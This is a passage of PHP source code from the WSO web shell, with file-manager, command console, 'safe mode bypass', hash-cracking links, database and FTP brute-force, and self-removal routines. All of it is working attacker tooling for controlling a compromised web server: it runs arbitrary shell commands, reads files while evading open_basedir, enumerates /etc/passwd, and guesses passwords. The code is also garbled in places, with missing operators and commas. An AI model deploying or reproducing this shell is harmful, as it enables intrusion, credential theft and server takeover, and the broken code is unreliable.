$f != ".") and ($f != ".."))
                                    
copy_paste($c.$s.'/',$f$d.$s.'/');
                        } elseif(
is_file($c.$s))
                            @
copy($c.$s$d.$s);
                    }
                    foreach(
$_SESSION['f'] as $f)
                        
copy_paste($_SESSION['c'],$f$GLOBALS['cwd']);
                } elseif(
$_SESSION['act'] == 'move') {
                    function 
move_paste($c,$s,$d){
                        if(
is_dir($c.$s)){
                            
mkdir($d.$s);
                            
$h = @opendir($c.$s);
                            while ((
$f = @readdir($h)) !== false)
                                if ((
$f != ".") and ($f != ".."))
                                    
copy_paste($c.$s.'/',$f$d.$s.'/');
                        } elseif(@
is_file($c.$s))
                            @
copy($c.$s$d.$s);
                    }
                    foreach(
$_SESSION['f'] as $f)
                        @
rename($_SESSION['c'].$f$GLOBALS['cwd'].$f);
                } elseif(
$_SESSION['act'] == 'zip') {
                    if(
class_exists('ZipArchive')) {
                        
$zip = new ZipArchive();
                        if (
$zip->open($_POST['p2'], 1)) {
                            
chdir($_SESSION['c']);
                            foreach(
$_SESSION['f'] as $f) {
                                if(
$f == '..')
                                    continue;
                                if(@
is_file($_SESSION['c'].$f))
                                    
$zip->addFile($_SESSION['c'].$f$f);
                                elseif(@
is_dir($_SESSION['c'].$f)) {
                                    
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
                                    foreach (
$iterator as $key=>$value) {
                                        
$zip->addFile(realpath($key), $key);
                                    }
                                }
                            }
                            
chdir($GLOBALS['cwd']);
                            
$zip->close();
                        }
                    }
                } elseif(
$_SESSION['act'] == 'unzip') {
                    if(
class_exists('ZipArchive')) {
                        
$zip = new ZipArchive();
                        foreach(
$_SESSION['f'] as $f) {
                            if(
$zip->open($_SESSION['c'].$f)) {
                                
$zip->extractTo($GLOBALS['cwd']);
                                
$zip->close();
                            }
                        }
                    }
                } elseif(
$_SESSION['act'] == 'tar') {
                    
chdir($_SESSION['c']);
                    
$_SESSION['f'] = array_map('escapeshellarg'$_SESSION['f']);
                    
wsoEx('tar cfzv ' escapeshellarg($_POST['p2']) . ' ' implode(' '$_SESSION['f']));
                    
chdir($GLOBALS['cwd']);
                }
                unset(
$_SESSION['f']);
                break;
            default:
                if(!empty(
$_POST['p1'])) {
                    
$_SESSION['act'] = @$_POST['p1'];
                    
$_SESSION['f'] = @$_POST['f'];
                    foreach(
$_SESSION['f'] as $k => $f)
                        
$_SESSION['f'][$k] = urldecode($f);
                    
$_SESSION['c'] = @$_POST['c'];
                }
                break;
        }
    }
    
$dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
    if(
$dirContent === false) {    echo 'Can\'t open this folder!';wsoFooter(); return; }
    global 
$sort;
    
$sort = array('name'1);
    if(!empty(
$_POST['p1'])) {
        if(
preg_match('!s_([A-z]+)_(\d{1})!'$_POST['p1'], $match))
            
$sort = array($match[1], (int)$match[2]);
    }
echo 
"<div class="base64" title='PHNjcmlwdD4NCglmdW5jdGlvbiBzYSgpIHsNCgkJZm9yKGk9MDtpPGQuZmlsZXMuZWxlbWVudHMubGVuZ3RoO2krKykNCgkJCWlmKGQuZmlsZXMuZWxlbWVudHNbaV0udHlwZSA9PSAnY2hlY2tib3gnKQ0KCQkJCWQuZmlsZXMuZWxlbWVudHNbaV0uY2hlY2tlZCA9IGQuZmlsZXMuZWxlbWVudHNbMF0uY2hlY2tlZDsNCgl9DQoNCjwvc2NyaXB0Pg==' ></div>


<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_"
.($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
    
$dirs $files = array();
    
$n count($dirContent);
    for(
$i=0;$i<$n;$i++) {
        
$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
        
$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
        
$tmp = array('name' => $dirContent[$i],
                     
'path' => $GLOBALS['cwd'].$dirContent[$i],
                     
'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
                     
'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
                     
'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
                     
'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
                     
'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
                    );
        if(@
is_file($GLOBALS['cwd'] . $dirContent[$i]))
            
$files[] = array_merge($tmp, array('type' => 'file'));
        elseif(@
is_link($GLOBALS['cwd'] . $dirContent[$i]))
            
$dirs[] = array_merge($tmp, array('type' => 'link''link' => readlink($tmp['path'])));
        elseif(@
is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != "."))
            
$dirs[] = array_merge($tmp, array('type' => 'dir'));
    }
    
$GLOBALS['sort'] = $sort;
    function 
wsoCmp($a$b) {
        if(
$GLOBALS['sort'][0] != 'size')
            return 
strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
        else
            return ((
$a['size'] < $b['size']) ? -1)*($GLOBALS['sort'][1]?1:-1);
    }
    
usort($files"wsoCmp");
    
usort($dirs"wsoCmp");
    
$files array_merge($dirs$files);
    
$l 0;
    foreach(
$files as $f) {
        echo 
'<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" title=' $f['link'] . '><b>[ ' htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
            .
'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
        
$l $l?0:1;
    }
    echo 
"<tr><td colspan=7>

    <input type=hidden name=a value='FilesMan'>
    <input type=hidden name=c value='" 
htmlspecialchars($GLOBALS['cwd']) ."'>
    <input type=hidden name=charset value='"
. (isset($_POST['charset'])?$_POST['charset']:'')."'>
    <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"
;
    if(
class_exists('ZipArchive'))
        echo 
"<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
    echo 
"<option value='tar'>Compress (tar.gz)</option>";
    if(!empty(
$_SESSION['act']) && @count($_SESSION['f']))
        echo 
"<option value='paste'>Paste / Compress</option>";
    echo 
"</select>&nbsp;";
    if(!empty(
$_SESSION['act']) && @count($_SESSION['f']) && (($_SESSION['act'] == 'zip') || ($_SESSION['act'] == 'tar')))
        echo 
"file name: <input type=text name=p2 value='wso_" date("Ymd_His") . "." . ($_SESSION['act'] == 'zip'?'zip':'tar.gz') . "'>&nbsp;";
    echo 
"<input type='submit' value='>>'></td></tr></form></table></div>";
    
wsoFooter();
}

function 
actionStringTools() {
    if(!
function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
    if(!
function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
    if(!
function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
    if(!
function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
    if(!
function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
    
$stringTools = array(
        
'Base64 encode' => 'base64_encode',
        
'Base64 decode' => 'base64_decode',
        
'Url encode' => 'urlencode',
        
'Url decode' => 'urldecode',
        
'Full urlencode' => 'full_urlencode',
        
'md5 hash' => 'md5',
        
'sha1 hash' => 'sha1',
        
'crypt' => 'crypt',
        
'CRC32' => 'crc32',
        
'ASCII to HEX' => 'ascii2hex',
        
'HEX to ASCII' => 'hex2ascii',
        
'HEX to DEC' => 'hexdec',
        
'HEX to BIN' => 'hex2bin',
        
'DEC to HEX' => 'dechex',
        
'DEC to BIN' => 'decbin',
        
'BIN to HEX' => 'binhex',
        
'BIN to DEC' => 'bindec',
        
'String to lower case' => 'strtolower',
        
'String to upper case' => 'strtoupper',
        
'Htmlspecialchars' => 'htmlspecialchars',
        
'String length' => 'strlen',
    );
    if(isset(
$_POST['ajax'])) {
        
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
        
ob_start();
        if(
in_array($_POST['p1'], $stringTools))
            echo 
$_POST['p1']($_POST['p2']);
        
$temp "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
        echo 
strlen($temp), "\n"$temp;
        exit;
    }
    
wsoHeader();
    echo 
'<h1>String conversions</h1><div class=content>';
    if(empty(
$_POST['ajax'])&&!empty($_POST['p1']))
        
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
    echo 
"<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
    foreach(
$stringTools as $k => $v)
        echo 
"<option value='".htmlspecialchars($v)."'>".$k."</option>";
        echo 
"</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
    if(!empty(
$_POST['p1'])) {
        if(
in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
    }
    echo
"</pre></div><br><h1>Search text in files:</h1><div class=content>

        <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
            <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
            <tr><td>Path:</td><td><input type='text' name='cwd' value='"
htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
            <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
            <tr><td></td><td><input type='submit' value='>>'></td></tr>
            </table></form>"
;

    function 
wsoRecursiveGlob($path) {
        if(
substr($path, -1) != '/')
            
$path.='/';
        
$paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*'GLOB_ONLYDIR)));
        if(
is_array($paths)&&@count($paths)) {
            foreach(
$paths as $item) {
                if(@
is_dir($item)){
                    if(
$path!=$item)
                        
wsoRecursiveGlob($item);
                } else {
                    if(@
strpos(@file_get_contents($item), @$_POST['p2'])!==false)
                        echo 
"<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\")'>".htmlspecialchars($item)."</a><br>";
                }
            }
        }
    }
    if(@
$_POST['p3'])
        
wsoRecursiveGlob($_POST['c']);
    echo 
"</div><br><h1>Search for hash:</h1><div class=content>

        <form method='post' target='_blank' name='hf'>
            <input type='text' name='hash' style='width:200px;'><br>
            <input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br>
            <input type='button' value='milw0rm.com' onclick=\"document.hf.action='http://www.milw0rm.com/cracker/search.php';document.hf.submit()\"><br>
            <input type='button' value='hashcracking.info' onclick=\"document.hf.action='https://hashcracking.info/index.php';document.hf.submit()\"><br>
            <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
            <input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br>
        </form></div>"
;
    
wsoFooter();
}

function 
actionFilesTools() {
    if( isset(
$_POST['p1']) )
        
$_POST['p1'] = urldecode($_POST['p1']);
    if(@
$_POST['p2']=='download') {
        if(@
is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
            
ob_start("ob_gzhandler"4096);
            
header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
            if (
function_exists("mime_content_type")) {
                
$type = @mime_content_type($_POST['p1']);
                
header("Content-Type: " $type);
            } else
                
header("Content-Type: application/octet-stream");
            
$fp = @fopen($_POST['p1'], "r");
            if(
$fp) {
                while(!@
feof($fp))
                    echo @
fread($fp1024);
                
fclose($fp);
            }
        }exit;
    }
    if( @
$_POST['p2'] == 'mkfile' ) {
        if(!
file_exists($_POST['p1'])) {
            
$fp = @fopen($_POST['p1'], 'w');
            if(
$fp) {
                
$_POST['p2'] = "edit";
                
fclose($fp);
            }
        }
    }
    
wsoHeader();
    echo 
'<h1>File tools</h1><div class=content>';
    if( !
file_exists(@$_POST['p1']) ) {
        echo 
'File not exists';
        
wsoFooter();
        return;
    }
    
$uid = @posix_getpwuid(@fileowner($_POST['p1']));
    if(!
$uid) {
        
$uid['name'] = @fileowner($_POST['p1']);
        
$gid['name'] = @filegroup($_POST['p1']);
    } else 
$gid = @posix_getgrgid(@filegroup($_POST['p1']));
    echo 
'<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
    echo 
'<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
    if( empty(
$_POST['p2']) )
        
$_POST['p2'] = 'view';
    if( 
is_file($_POST['p1']) )
        
$m = array('View''Highlight''Download''Hexdump''Edit''Chmod''Rename''Touch');
    else
        
$m = array('Chmod''Rename''Touch');
    foreach(
$m as $v)
        echo 
'<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
    echo 
'<br><br>';
    switch(
$_POST['p2']) {
        case 
'view':
            echo 
'<pre class=ml1>';
            
$fp = @fopen($_POST['p1'], 'r');
            if(
$fp) {
                while( !@
feof($fp) )
                    echo 
htmlspecialchars(@fread($fp1024));
                @
fclose($fp);
            }
            echo 
'</pre>';
            break;
        case 
'highlight':
            if( @
is_readable($_POST['p1']) ) {
                echo 
'<div class=ml1 style="background-color: #e1e1e1;color:black;">';
                
$code = @highlight_file($_POST['p1'],true);
                echo 
str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
            }
            break;
        case 
'chmod':
            if( !empty(
$_POST['p3']) ) {
                
$perms 0;
                for(
$i=strlen($_POST['p3'])-1;$i>=0;--$i)
                    
$perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
                if(!@
chmod($_POST['p1'], $perms))
                    echo 
'Can\'t set permissions!<br><div class="base64" title='PHNjcmlwdD5kb2N1bWVudC5tZi5wMy52YWx1ZT0iIjs8L3NjcmlwdD4=' ></div>

'
;
            }
            
clearstatcache();
            echo 
'<div class="base64" title='PHNjcmlwdD5wM189IiI7PC9zY3JpcHQ+' ></div>

<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'
.substr(sprintf('%o'fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
            break;
        case 
'edit':
            if( !
is_writable($_POST['p1'])) {
                echo 
'File isn\'t writeable';
                break;
            }
            if( !empty(
$_POST['p3']) ) {
                
$time = @filemtime($_POST['p1']);
                
$_POST['p3'] = substr($_POST['p3'],1);
                
$fp = @fopen($_POST['p1'],"w");
                if(
$fp) {
                    @
fwrite($fp,$_POST['p3']);
                    @
fclose($fp);
                    echo 
'Saved!<br><div class="base64" title='PHNjcmlwdD5wM189IiI7PC9zY3JpcHQ+' ></div>

'
;
                    @
touch($_POST['p1'],$time,$time);
                }
            }
            echo 
'<form onsubmit="g(null,null,null,null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
            
$fp = @fopen($_POST['p1'], 'r');
            if(
$fp) {
                while( !@
feof($fp) )
                    echo 
htmlspecialchars(@fread($fp1024));
                @
fclose($fp);
            }
            echo 
'</textarea><input type=submit value=">>"></form>';
            break;
        case 
'hexdump':
            
$c = @file_get_contents($_POST['p1']);
            
$n 0;
            
$h = array('00000000<br>','','');
            
$len strlen($c);
            for (
$i=0$i<$len; ++$i) {
                
$h[1] .= sprintf('%02X',ord($c[$i])).' ';
                switch ( 
ord($c[$i]) ) {
                    case 
0:  $h[2] .= ' '; break;
                    case 
9:  $h[2] .= ' '; break;
                    case 
10$h[2] .= ' '; break;
                    case 
13$h[2] .= ' '; break;
                    default: 
$h[2] .= $c[$i]; break;
                }
                
$n++;
                if (
$n == 32) {
                    
$n 0;
                    if (
$i+$len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
                    
$h[1] .= '<br>';
                    
$h[2] .= "\n";
                }
             }
            echo 
'<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
            break;
        case 
'rename':
            if( !empty(
$_POST['p3']) ) {
                if(!@
rename($_POST['p1'], $_POST['p3']))
                    echo 
'Can\'t rename!<br>';
                else
                    die(
'<div class="base64" title='PHNjcmlwdD5nKG51bGwsbnVsbCwiJy51cmxlbmNvZGUoJF9QT1NUWydwMyddKS4nIixudWxsLCIiKTwvc2NyaXB0Pg==' ></div>

'
);
            }
            echo 
'<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
            break;
        case 
'touch':
            if( !empty(
$_POST['p3']) ) {
                
$time strtotime($_POST['p3']);
                if(
$time) {
                    if(!
touch($_POST['p1'],$time,$time))
                        echo 
'Fail!';
                    else
                        echo 
'Touched!';
                } else echo 
'Bad time format!';
            }
            
clearstatcache();
            echo 
'<div class="base64" title='PHNjcmlwdD5wM189IiI7PC9zY3JpcHQ+' ></div>

<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'
.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
            break;
    }
    echo 
'</div>';
    
wsoFooter();
}

function 
actionSafeMode() {
    
$temp='';
    
ob_start();
    switch(
$_POST['p1']) {
        case 
1:
            
$temp=@tempnam($test'cx');
            if(@
copy("compress.zlib://".$_POST['p2'], $temp)){
                echo @
file_get_contents($temp);
                
unlink($temp);
            } else
                echo 
'Sorry... Can\'t open file';
            break;
        case 
2:
            
$files glob($_POST['p2'].'*');
            if( 
is_array($files) )
                foreach (
$files as $filename)
                    echo 
$filename."\n";
            break;
        case 
3:
            
$ch curl_init("file://".$_POST['p2']."\x00".preg_replace('!\(\d+\)\s.*!'''__FILE__));
            
curl_exec($ch);
            break;
        case 
4:
            
ini_restore("safe_mode");
            
ini_restore("open_basedir");
            include(
$_POST['p2']);
            break;
        case 
5:
            for(;
$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
                
$uid = @posix_getpwuid($_POST['p2']);
                if (
$uid)
                    echo 
join(':',$uid)."\n";
            }
            break;
    }
    
$temp ob_get_clean();
    
wsoHeader();
    echo 
'<h1>Safe mode bypass</h1><div class=content>';
    echo 
'<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
    if(
$temp)
        echo 
'<pre class="ml1" style="margin-top:5px" id="Output">'.htmlspecialchars($temp).'</pre>';
    echo 
'</div>';
    
wsoFooter();
}

function 
actionConsole() {
    if(!empty(
$_POST['p1']) && !empty($_POST['p2'])) {
        
$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = true;
        
$_POST['p1'] .= ' 2>&1';
    } elseif(!empty(
$_POST['p1']))
        
$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = false;

    if(isset(
$_POST['ajax'])) {
        
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
        
ob_start();
        echo 
"d.cf.cmd.value='';\n";
        
$temp = @iconv($_POST['charset'], 'UTF-8'addcslashes("\n$ ".$_POST['p1']."\n".wsoEx($_POST['p1']),"\n\r\t\\'\0"));
        if(
preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match))    {
            if(@
chdir($match[1])) {
                
$GLOBALS['cwd'] = @getcwd();
                echo 
"c_='".$GLOBALS['cwd']."';";
            }
        }
        echo 
"d.cf.output.value+='".$temp."';";
        echo 
"d.cf.output.scrollTop = d.cf.output.scrollHeight;";
        
$temp ob_get_clean();
        echo 
strlen($temp), "\n"$temp;
        exit;
    }
    
wsoHeader();
    echo 
"<div class="base64" title='PHNjcmlwdD4NCmlmKHdpbmRvdy5FdmVudCkgd2luZG93LmNhcHR1cmVFdmVudHMoRXZlbnQuS0VZRE9XTik7DQp2YXIgY21kcyA9IG5ldyBBcnJheSgnJyk7DQp2YXIgY3VyID0gMDsNCmZ1bmN0aW9uIGtwKGUpIHsNCgl2YXIgbiA9ICh3aW5kb3cuRXZlbnQpID8gZS53aGljaCA6IGUua2V5Q29kZTsNCglpZihuID09IDM4KSB7DQoJCWN1ci0tOw0KCQlpZihjdXI+PTApDQoJCQlkb2N1bWVudC5jZi5jbWQudmFsdWUgPSBjbWRzW2N1cl07DQoJCWVsc2UNCgkJCWN1cisrOw0KCX0gZWxzZSBpZihuID09IDQwKSB7DQoJCWN1cisrOw0KCQlpZihjdXIgPCBjbWRzLmxlbmd0aCkNCgkJCWRvY3VtZW50LmNmLmNtZC52YWx1ZSA9IGNtZHNbY3VyXTsNCgkJZWxzZQ0KCQkJY3VyLS07DQoJfQ0KfQ0KZnVuY3Rpb24gYWRkKGNtZCkgew0KCWNtZHMucG9wKCk7DQoJY21kcy5wdXNoKGNtZCk7DQoJY21kcy5wdXNoKCcnKTsNCgljdXIgPSBjbWRzLmxlbmd0aC0xOw0KfQ0KDQo8L3NjcmlwdD4=' ></div>

"
;
    echo 
'<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
    foreach(
$GLOBALS['aliases'] as $n => $v) {
        if(
$v == '') {
            echo 
'<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
            continue;
        }
        echo 
'<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
    }
    if(empty(
$_POST['ajax'])&&!empty($_POST['p1']))
        
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
    echo 
'</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
    if(!empty(
$_POST['p1'])) {
        echo 
htmlspecialchars("$ ".$_POST['p1']."\n".wsoEx($_POST['p1']));
    }
    echo 
'</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
    echo 
'</form></div><div class="base64" title='PHNjcmlwdD5kLmNmLmNtZC5mb2N1cygpOzwvc2NyaXB0Pg==' ></div>

'
;
    
wsoFooter();
}

function 
actionLogout() {
    
session_destroy();
    die(
'bye!');
}

function 
actionSelfRemove() {

    if(
$_POST['p1'] == 'yes')
        if(@
unlink(preg_replace('!\(\d+\)\s.*!'''__FILE__)))
            die(
'Shell has been removed');
        else
            echo 
'unlink error!';
    if(
$_POST['p1'] != 'yes')
        
wsoHeader();
    echo 
'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
    
wsoFooter();
}

function 
actionBruteforce() {
    
wsoHeader();
    if( isset(
$_POST['proto']) ) {
        echo 
'<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
        if( 
$_POST['proto'] == 'ftp' ) {
            function 
bruteForce($ip,$port,$login,$pass) {
                
$fp = @ftp_connect($ip$port?$port:21);
                if(!
$fp) return false;
                
$res = @ftp_login($fp$login$pass);
                @
ftp_close($fp);
                return 
$res;
            }
        } elseif( 
$_POST['proto'] == 'mysql' ) {
            function 
bruteForce($ip,$port,$login,$pass) {
                
$res = @mysql_connect($ip.':'.$port?$port:3306$login$pass);
                @
mysql_close($res);
                return 
$res;
            }
        } elseif( 
$_POST['proto'] == 'pgsql' ) {
            function 
bruteForce($ip,$port,$login,$pass) {
                
$str "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
                
$res = @pg_connect($str);
                @
pg_close($res);
                return 
$res;
            }
        }
        
$success 0;
        
$attempts 0;
        
$server explode(":"$_POST['server']);
        if(
$_POST['type'] == 1) {
            
$temp = @file('/etc/passwd');
            if( 
is_array($temp) )
                foreach(
$temp as $line) {
                    
$line explode(":"$line);
                    ++
$attempts;
                    if( 
bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
                        
$success++;
                        echo 
'<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
                    }
                    if(@
$_POST['reverse']) {
                        
$tmp "";
                        for(
$i=strlen($line[0])-1$i>=0; --$i)
                            
$tmp .= $line[0][$i];
                        ++
$attempts;
                        if( 
bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
                            
$success++;
                            echo 
'<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
                        }
                    }
                }
        } elseif(
$_POST['type'] == 2) {
            
$temp = @file($_POST['dict']);
            if( 
is_array($temp) )
                foreach(
$temp as $line) {
                    
$line trim($line);
                    ++
$attempts;
                    if( 
bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
                        
$success++;
                        echo 
'<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
                    }
                }
        }
        echo 
"<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
    }
    echo 
'<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
        
.'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
        
.'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
        
.'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
        
.'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
        
.'<span>Server:port</span></td>'
        
.'<td><input type=text name=server value="127.0.0.1"></td></tr>'
        
.'<tr><td><span>Brute type</span></td>'
        
